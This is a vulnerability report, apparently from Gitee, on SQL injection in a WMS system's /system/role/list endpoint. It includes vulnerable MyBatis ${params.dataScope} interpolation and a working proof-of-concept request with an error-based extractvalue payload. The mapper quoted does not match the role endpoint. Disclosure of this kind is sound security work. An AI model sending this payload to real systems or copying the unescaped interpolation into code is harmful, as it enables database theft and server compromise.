SQL injection vulnerability on /system/role/list

# Summary

In the latest version, a parameter passed to the endpoint `/system/role/list` are user-controllable and not sanitized, and no prepared statements are used when executing the final SQL query, resulting in a SQL injection vulnerability. Attackers can exploit this vulnerability to obtain sensitive data from the database and even gain complete control of the server.

---

# Details

### taint analysis:

- wms-system/src/main/resources/mapper/system/SysUserMapper.xml
```
    <select id="selectUnallocatedList" parameterType="SysUser" resultMap="SysUserResult">
        select distinct u.user_id, u.dept_id, u.login_name, u.user_name, u.email, u.phonenumber, u.status, u.create_time
        from sys_user u
             left join sys_dept d on u.dept_id = d.dept_id
             left join sys_user_role ur on u.user_id = ur.user_id
             left join sys_role r on r.role_id = ur.role_id
        where u.del_flag = '0' and (r.role_id != #{roleId} or r.role_id IS NULL)
        and u.user_id not in (select u.user_id from sys_user u inner join sys_user_role ur on u.user_id = ur.user_id and ur.role_id = #{roleId})
        <if test="loginName != null and loginName != ''">
            AND u.login_name like concat('%', #{loginName}, '%')
        </if>
        <if test="phonenumber != null and phonenumber != ''">
            AND u.phonenumber like concat('%', #{phonenumber}, '%')
        </if>
        
        ${params.dataScope}
    </select>
```

- com/deer/wms/admin/controller/system/SysRoleController.java
```
@RequiresPermissions("system:role:list")
@PostMapping("/list")
@ResponseBody
public TableDataInfo list(SysRole role)
{
    startPage();
    List<SysRole> list = roleService.selectRoleList(role);
    return getDataTable(list);
}

```

---

# POC
```
POST /system/role/list HTTP/1.1
Host: 127.0.0.1:8090
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=084fc179-6107-42e1-9a47-f56116246ab1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

```
![输入图片说明](https://foruda.gitee.com/images/1752224366302563701/7e4cbf52_8279293.png "屏幕截图")
---

# Impact
https://portswigger.net/web-security/sql-injection#what-is-the-impact-of-a-successful-sql-injection-attack

---

wms仓库管理系统/立体仓库WMS

内容风险标识

评论 (0)

wms仓库管理系统/立体仓库WMS .gitee-modal { width: 500px !important; }

内容风险标识